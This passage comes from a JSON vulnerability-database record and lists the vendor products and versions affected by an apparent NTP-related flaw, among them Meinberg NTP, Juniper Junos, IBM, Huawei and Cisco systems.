"eq", "trust": 0.6, "vendor": "redhat", "version": "5" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "7" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "5" }, { "model": "communications policy management", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "12.1.1" }, { "model": "communications policy management", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "10.4.1" }, { "model": "communications policy management", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "9.9.1" }, { "model": "communications policy management", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "9.7.3" }, { "model": "network time protocol 4.2.7p10", "scope": null, "trust": 0.6, "vendor": "meinberg", "version": null }, { "model": "network time protocol", "scope": "eq", "trust": 0.6, "vendor": "meinberg", "version": "4.2.7" }, { "model": "network time protocol", "scope": "eq", "trust": 0.6, "vendor": "meinberg", "version": "4.2.6" }, { "model": "network time protocol", "scope": "eq", "trust": 0.6, "vendor": "meinberg", "version": "4.2.5" }, { "model": "network time protocol 4.2.4p8@lennon-o-lpv", "scope": null, "trust": 0.6, "vendor": "meinberg", "version": null }, { "model": "network time protocol 4.2.4p7@copenhagen-o", "scope": null, "trust": 0.6, "vendor": "meinberg", "version": null }, { "model": "network time protocol", "scope": "eq", "trust": 0.6, "vendor": "meinberg", "version": "4.2.4" }, { "model": "network time protocol", "scope": "eq", "trust": 0.6, "vendor": "meinberg", "version": "4.2.2" }, { "model": "network time protocol", "scope": "eq", "trust": 0.6, "vendor": "meinberg", "version": "4.2.0" }, { "model": "network time protocol", "scope": "eq", "trust": 0.6, "vendor": "meinberg", "version": "4.1.0" }, { "model": "network time protocol", "scope": "eq", "trust": 0.6, "vendor": "meinberg", "version": "4.0" }, { "model": "business server", "scope": "eq", "trust": 0.6, "vendor": "mandriva", "version": "1x8664" }, { "model": "business server", "scope": "eq", "trust": 0.6, "vendor": "mandriva", "version": "1" }, { "model": "vgw", "scope": "eq", "trust": 0.6, "vendor": "juniper", "version": "0" }, { "model": "nsmexpress", "scope": "eq", "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "nsm server software", "scope": "eq", "trust": 0.6, "vendor": "juniper", "version": "0" }, { "model": "nsm series appliances", "scope": "eq", "trust": 0.6, "vendor": "juniper", "version": "0" }, { "model": "nsm", "scope": "eq", "trust": 0.6, "vendor": "juniper", "version": "0" }, { "model": "junos space", "scope": "eq", "trust": 0.6, "vendor": "juniper", "version": "0" }, { "model": "junos os 14.2r1", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 14.1r2-s2", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 14.1r2", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 14.1r1", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 13.3r4", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 13.3r3-s2", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 13.3r3", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 13.3r2-s3", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 13.3r1", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 13.2x51-d25", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 13.2r5-s1", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 13.2r5", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 13.1x50-d30", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 13.1r4-s3", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 13.1r4-s2", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 12.3r8", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 12.3r7", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 12.2x50-d70", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 12.2r9", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 12.1x47-d15", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 12.1x47-d10", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 12.1x46-d25", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 12.1x46-d20", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 12.1x44-d40", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 11.4r12-s4", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 11.4r12-s1", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os", "scope": "eq", "trust": 0.6, "vendor": "juniper", "version": "0" }, { "model": "xeon phi 7120p", "scope": null, "trust": 0.6, "vendor": "intel", "version": null }, { "model": "xeon phi 7120a", "scope": null, "trust": 0.6, "vendor": "intel", "version": null }, { "model": "xeon phi 5110p", "scope": null, "trust": 0.6, "vendor": "intel", "version": null }, { "model": "xeon phi 3120a", "scope": null, "trust": 0.6, "vendor": "intel", "version": null }, { "model": "manycore platform software stack", "scope": "eq", "trust": 0.6, "vendor": "intel", "version": "3.4" }, { "model": "manycore platform software stack", "scope": "eq", "trust": 0.6, "vendor": "intel", "version": "3.3" }, { "model": "manycore platform software stack", "scope": "eq", "trust": 0.6, "vendor": "intel", "version": "3.2" }, { "model": "manycore platform software stack", "scope": "eq", "trust": 0.6, "vendor": "intel", "version": "3.1" }, { "model": "manycore platform software stack", "scope": "eq", "trust": 0.6, "vendor": "intel", "version": "2.1" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.3" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.14" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "smartcloud entry fp", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "3.19" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "3.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "77100" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "77000" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "76000" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "56003" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "56002" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "56001" }, { "model": "security network protection", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "71005.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "71005.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "51005.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "51005.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "41005.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "41005.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "31005.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "31005.2" }, { "model": "pureflex", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "x3950x6" }, { "model": "pureflex", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "x3850x6" }, { "model": "pureflex x240m5+pen", "scope": null, "trust": 0.6, "vendor": "ibm", "version": null }, { "model": "pureflex x240m4", "scope": null, "trust": 0.6, "vendor": "ibm", "version": null }, { "model": "pureflex x220m4", "scope": null, "trust": 0.6, "vendor": "ibm", "version": null }, { "model": "puredata system for operational analytics", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "1.1" }, { "model": "puredata system for operational analytics", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "1.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "8.8.2.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "8.8.1.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "7.7.9.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "7.7.8.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "7.7.7.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "7.7.3.0" }, { "model": "nextscale nx360m5", "scope": null, "trust": 0.6, "vendor": "ibm", "version": null }, { "model": "nextscale nx360m4", "scope": null, "trust": 0.6, "vendor": "ibm", "version": null }, { "model": "netezza host management", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "5.3.3" }, { "model": "idataplex dx360m4", "scope": null, "trust": 0.6, "vendor": "ibm", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "7.1" }, { "model": "aix", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "6.1" }, { "model": "aix", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "5.3" }, { "model": "rack v100r001c00", "scope": "eq", "trust": 0.6, "vendor": "huawei", "version": "x8000" }, { "model": "v1300n v100r002c02", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "tecal xh621 v100r001c00b010", "scope": "eq", "trust": 0.6, "vendor": "huawei", "version": "v2" }, { "model": "tecal xh320 v100r001c00spc105", "scope": "eq", "trust": 0.6, "vendor": "huawei", "version": "v2" }, { "model": "tecal xh311 v100r001c00spc100", "scope": "eq", "trust": 0.6, "vendor": "huawei", "version": "v2" }, { "model": "tecal xh310 v100r001c00spc100", "scope": "eq", "trust": 0.6, "vendor": "huawei", "version": "v2" }, { "model": "rh5885h v100r003c00", "scope": "eq", "trust": 0.6, "vendor": "huawei", "version": "v3" }, { "model": "rh5885 v100r003c01", "scope": "eq", "trust": 0.6, "vendor": "huawei", "version": "v3" }, { "model": "rh5885 v100r001c00", "scope": "eq", "trust": 0.6, "vendor": "huawei", "version": "v2" }, { "model": "rh2485 v100r002c00", "scope": "eq", "trust": 0.6, "vendor": "huawei", "version": "v2" }, { "model": "rh2288h v100r002c00", "scope": "eq", "trust": 0.6, "vendor": "huawei", "version": "v2" }, { "model": "rh2288e v100r002c00", "scope": "eq", "trust": 0.6, "vendor": "huawei", "version": "v2" }, { "model": "rh2288 v100r002c00", "scope": "eq", "trust": 0.6, "vendor": "huawei", "version": "v2" }, { "model": "rh2285h v100r002c00", "scope": "eq", "trust": 0.6, "vendor": "huawei", "version": "v2" }, { "model": "rh2285 v100r002c00", "scope": "eq", "trust": 0.6, "vendor": "huawei", "version": "v2" }, { "model": "rh1288 v100r002c00", "scope": "eq", "trust": 0.6, "vendor": "huawei", "version": "v2" }, { "model": "oceanstor uds v100r002c01", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "oceanstor uds v100r002c00", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "oceanstor s6800t v200r002c00", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "oceanstor s5800t v200r002c00", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "oceanstor s5600t v100r002c00", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "oceanstor s5500t v200r002c00", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "oceanstor s2600t v200r002c00", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "oceanstor hvs88t v100r001c00", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "oceanstor hvs85t v100r001c00", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "oceanstor 18800f v100r001c00", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "oceanstor v100r001c00", "scope": "eq", "trust": 0.6, "vendor": "huawei", "version": "18800" }, { "model": "high-density server dh628 v100r001c00", "scope": "eq", "trust": 0.6, "vendor": "huawei", "version": "v2" }, { "model": "high-density server dh621 v100r001c00", "scope": "eq", "trust": 0.6, "vendor": "huawei", "version": "v2" }, { "model": "high-density server dh620 v100r001c00", "scope": "eq", "trust": 0.6, "vendor": "huawei", "version": "v2" }, { "model": "high-density server dh320 v100r001c00", "scope": "eq", "trust": 0.6, "vendor": "huawei", "version": "v2" }, { "model": "fusionsphere openstack v100r005c00", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "fusioncube v100r002c02spc300", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "fusioncube v100r002c02spc200", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "fusioncube v100r002c02spc100", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "fusioncube v100r002c01spc100", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "fusioncompute v100r005c10", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "fusioncompute v100r005c00", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "fusioncompute v100r003c10", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "fusioncompute v100r003c00", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "fusionaccess v100r005c20", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "fusionaccess v100r005c10", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "espace vtm v100r002c00", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "espace vtm v100r001c30", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "espace vtm v100r001c02", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "espace vcn3000 v100r002c00", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "espace usm v200r003c00", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "espace uc v200r003c00", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "espace uc v200r002c01", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "espace uc v100r002c00", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "espace u2980 v200r003c00", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "espace u2980 v100r001c02spc200", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "espace u2980 v100r001c01", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "espace ivs v100r001c02", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "espace dcm v100r002c01", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "espace dcm v100r001c03", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "espace dcm v100r001c02", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "espace dcm v100r001c01", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "espace cc v200r001c50", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "espace cc v200r001c32", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "espace cc v200r001c31", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "espace cc v200r001c03", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "espace cad v100r001c01lhue01", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "esight uc\u0026c v100r001c20", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "esight uc\u0026c v100r001c01", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "esight network v200r005c00", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "esight network v200r003c10", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "esight network v200r003c01", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "e9000 chassis v100r001c00", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "e6000 chassis v100r001c00", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "dc v100r002c01spc001", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.6, "vendor": "hp", "version": "2.10" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.6, "vendor": "hp", "version": "2.01" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.6, "vendor": "hp", "version": "2.0" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.6, "vendor": "hp", "version": "1.2" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.6, "vendor": "hp", "version": "1.1" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.6, "vendor": "hp", "version": "1.0" }, { "model": "vcx", "scope": "eq", "trust": 0.6, "vendor": "hp", "version": "0" }, { "model": "tcp/ip services for openvms", "scope": "eq", "trust": 0.6, "vendor": "hp", "version": "5.7" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.6, "vendor": "hp", "version": null }, { "model": "advanced server ha8000cr", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "0" }, { "model": "linux", "scope": null, "trust": 0.6, "vendor": "gentoo", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.6, "vendor": "freebsd", "version": "0" }, { "model": "vipr srm", "scope": "eq", "trust": 0.6, "vendor": "emc", "version": "3.6.0" }, { "model": "m\u0026r", "scope": "eq", "trust": 0.6, "vendor": "emc", "version": "6.5" }, { "model": "linux sparc", "scope": "eq", "trust": 0.6, "vendor": "debian", "version": "6.0" }, { "model": "linux s/390", "scope": "eq", "trust": 0.6, "vendor": "debian", "version": "6.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.6, "vendor": "debian", "version": "6.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.6, "vendor": "debian", "version": "6.0" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.6, "vendor": "debian", "version": "6.0" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.6, "vendor": "debian", "version": "6.0" }, { "model": "linux arm", "scope": "eq", "trust": 0.6, "vendor": "debian", "version": "6.0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.6, "vendor": "debian", "version": "6.0" }, { "model": "netscaler gateway", "scope": "eq", "trust": 0.6, "vendor": "citrix", "version": "0" }, { "model": "netscaler application delivery controller", "scope": "eq", "trust": 0.6, "vendor": "citrix", "version": "0" }, { "model": "wide area application services", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "webex social", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "webex meetings server base", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "2.5" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "2.5" }, { "model": "webex meetings server 2.0mr2", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "webex meetings server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "2.0" }, { "model": "virtualization experience client", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "62150" }, { "model": "virtual systems operations center for vpe project", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "virtual security gateway", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "videoscape conductor", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "videoscape back office", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "video delivery system recorder", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "universal small cell ran management system wireless", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "unity connection", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "unified sip proxy", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "unified provisioning manager", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "8.6" }, { "model": "unified meetingplace", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "unified intelligence center", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "unified contact center express", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "unified communications domain manager", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "ucs manager", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "ucs invicta series", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "ucs director", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "transaction encryption device", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "telepresence tx series", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "90000" }, { "model": "telepresence te software", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "-0" }, { "model": "telepresence system", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "500-370" }, { "model": "telepresence system", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "500-320" }, { "model": "telepresence system series", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "30000" }, { "model": "telepresence system", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "13000" }, { "model": "telepresence system", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "11000" }, { "model": "telepresence system", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "10000" }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "telepresence", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "13100" }, { "model": "show and share", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "service control engines system software", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "scos", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "remote network control system", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "remote conditional access system", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "quantum son suite", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "quantum policy suite", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "prime service catalog virtual appliance", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "prime license manager", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "prime lan management solution", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "prime infrastructure", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "powervu network center", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "powervu d9190 conditional access manager", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "powerkey encryption server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "physical access manager", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "90000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "70000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "60000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "50000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "40000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "30000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "1000v0" }, { "model": "network configuration and change management service", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "network configuration and change management", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "netflow collection agent", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "mediasense", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "media experience engines", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "mds series multilayer switches", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "90000" }, { "model": "management heartbeat server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "jabber guest", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "iptv service delivery system", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "ip interoperability and collaboration system", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "ios xr software", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "ios xr for cisco network convergence system", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "60000" }, { "model": "international digital network control system", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "intelligent automation for cloud", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "im and presence service", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "firesight system software", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "finesse", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "explorer controller", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "enterprise content delivery service", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "encryption appliance", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "emergency responder", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "emergency responder", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "dncs application server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "digital transport adapter control system", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "digital network control system", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "digital media manager", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "dcm series 9900-digital content manager", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "d9036 modular encoding platform", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "common services platform collector", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "common download server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "command server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "20000" }, { "model": "cloud object store", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "telepresence endpoints sx series", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "telepresence endpoints mxg2 series", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "telepresence endpoints mx series", "scope": 